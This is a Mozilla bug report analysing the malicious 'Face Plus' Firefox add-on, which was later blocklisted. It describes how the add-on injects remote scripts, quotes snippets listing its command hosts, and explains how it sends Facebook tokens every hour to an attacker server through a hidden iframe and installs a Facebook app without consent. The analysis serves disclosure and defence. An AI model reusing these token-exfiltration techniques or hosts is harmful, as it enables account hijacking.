Last Comment Bug 743012 - Malicious "Face Plus" add-on
: Malicious "Face Plus" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-04-05 15:12 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120406_faceplus.zip (490.38 KB, application/octet-stream)
2012-04-05 15:12 PDT, MarkH
no flags Details

Description MarkH 2012-04-05 15:12:22 PDT
Created attachment 612702 [details]
20120406_faceplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded from http://install.faceplus.biz/face-plus.xpi



Actual results:

NOTE: Attempt to access any of the JS directly, without a referer of
Facebook will get you bounced to
http://userscripts.org/scripts/source/61761.user.js, which is the
SocialFixer plugin JS

adobeflashplayer.js:

JS in add-on
Injects http://cdn.faceplus.biz/faceplus.js,



faceplus.js:

URLs included at start of script
var reklam ="http://ads.faceplus.biz/reklam.html?&s&";
var bokcurl='http://faceklenti10.zapto.org/yon.php';
linek=new
Array("http://begeni.zapto.org/yon.php","http://faceplus2.mm.am/yon.php","h
ttp://faceplus3.mm.am/yon.php","http://faceplus4.mm.am/yon.php","http://fac
eplus5.mm.am/yon.php","http://faceplus.crabdance.com/yon.php","http://facep
lus.uk.to/yon.php","http://faceplus.ignorelist.com/","http://faceplus.stran
gled.net/","http://faceplus.twilightparadox.com/
<http://begeni.zapto.org/yon.php%22,%22http://faceplus2.mm.am/yon.php%22,%2
2http://faceplus3.mm.am/yon.php%22,%22http://faceplus4.mm.am/yon.php%22,%22
http://faceplus5.mm.am/yon.php%22,%22http://faceplus.crabdance.com/yon.php%
22,%22http://faceplus.uk.to/yon.php%22,%22http://faceplus.ignorelist.com/%2
2,%22http://faceplus.strangled.net/%22,%22http://faceplus.twilightparadox.c
om/>");


Injects http://graph.facebook.com/<uid>?callback=cins, to get your public
profile data

Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js

Tries to inject
'http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03
/16/1333458695713783.jpg as a script, AWS returns an error


graph.js:

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Injects
http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/
19/1332953948955831.jpg as the source of a script tag

Uses local storage to maintain state

z.js:

Can do the following, based on configuration:
like a page
add a subscription
send a friend request
report users as abusive

Auto installs FB App 338319369521728, giving it full access to the user's
account

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Uses local storage to maintain state



Expected results:

It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-04-09 10:02:50 PDT
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-09 10:04:50 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i82

Note You need to log in before you can comment on or make changes to this bug.